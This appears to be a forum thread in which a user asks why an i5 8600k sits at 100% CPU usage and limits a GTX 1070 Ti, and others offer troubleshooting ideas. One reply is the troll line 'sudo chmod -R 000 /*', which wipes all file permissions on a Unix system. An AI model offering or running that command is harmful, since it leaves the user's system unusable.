I5 8600k Bottlenecking my 1070ti

Hey guys

Eversince i upgraded to my new 1070ti i realized an unsual performance in my games

ive been getting substancially less fps than benchmarks i saw online on certain games with weaker cpu's like i54670k etc getting better fps than my 8600k

so ive been digging around the net for solutions and didnt find any.Yesterday i realized that my cpu usage is off the roof 95% of the time its 100% usage even when there is no games open which is super weird

can anybody help me would be really nice

It would seem very unlikely that a 8600k (i assume your cpu is overclocked) would bottleneck a 1070ti... I think it's probably a optimization problem.

What programs are chewing your CPU usage? Can you see that if you open task manager?

What frequency is your CPU running at?

That "smart game booster" you're running is hogging 20% of the cpu on its own... it doesn't seem very smart to me. Try turning that off.

But even without that the numbers don't add up... run an anti malware scan, you may have caught a miner virus.

Quote people when you answer them or they won't get a notification.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

i didnt try installing a anti malware software but before i installed this gpu i did a clean windows install with full format so could it really be a virus

This guy has the same exact build as me and im average 100 to 130  fps with constant frame drops so i dont know if its optimization or not

So if i overclock it will it solve the issue becuase idk but if overclock has anything to do with the constant 100% cpu usage

Did you or he install the chipset driver?  That can cause usage problem in 10 if you do not, and have you tried uninstalling that app?

Where do i instal the chipset

This issue was occuring before i even installed this app because even when i boot to windows its instant 100% cpu usage

Well, certain programs, like chrome, are notorious for randomly increasing usage.  This is a big problem with windows 10.

Shouldn't keep the cpu pinned at 100%... especially if it's impacting system performance.

Did you disable the "booster"?

No, this clearly has nothing to do with your hardware.

Try reinstalling windows, maybe it's just a botched installation...

It would actually solve the problem (in theory) becuase the CPU feeds data to the video card. If the CPU cannot supply the video card with data as fast as it can process it, the CPU becomes a bottleneck.

So youre saying i should attempt to overclock the cpu?

You'd be surprised the odd bugs sw can do in Windows 10.  To be fair, it's extremely rare for the CPU to be pinned that high due to it and it usually more RAM related.  But this is either a SW issue or a driver issue, not a hw issue.

So what can be done now?

The booster causes nothing disabled or not

could it actually be a bad installation and what are the chances of that

I'm not a statistician.

If the problem ensued right after installing windows it's either a bad installation or missing drivers. Reinstalling windows doesn't take that long.

My two cents:

  • Your 8600k isn't bottlenecking your 1070ti.
    • I've got a 1700x and GTX1080 and my CPU isn't bottlenecking my performance
  • You should close or remove unnecessary programms
    • game booster don't work,
  • overclock your CPU if you're comfortable with it
    • You bought an unlocked cpu so you better use it otherwise you wasted money
  • At idle you shoud be around 1-10% CPU load otherwise something is wrong
    • with Chrome, Rainmeter, Word, Excel and Taskmanager I'm getting 3% of load.
    • run malewarebyte or roguekiller on your system even a fresh windows install can get maleware fast.
  • Why is "Desktop Window Manager" taking 10% of your load?
    • I don't even have that process running on my pc

Hope I helped Quote me if you want additional help

Windows 10 gives you the option to keep your files when you don't change os and only reinstall
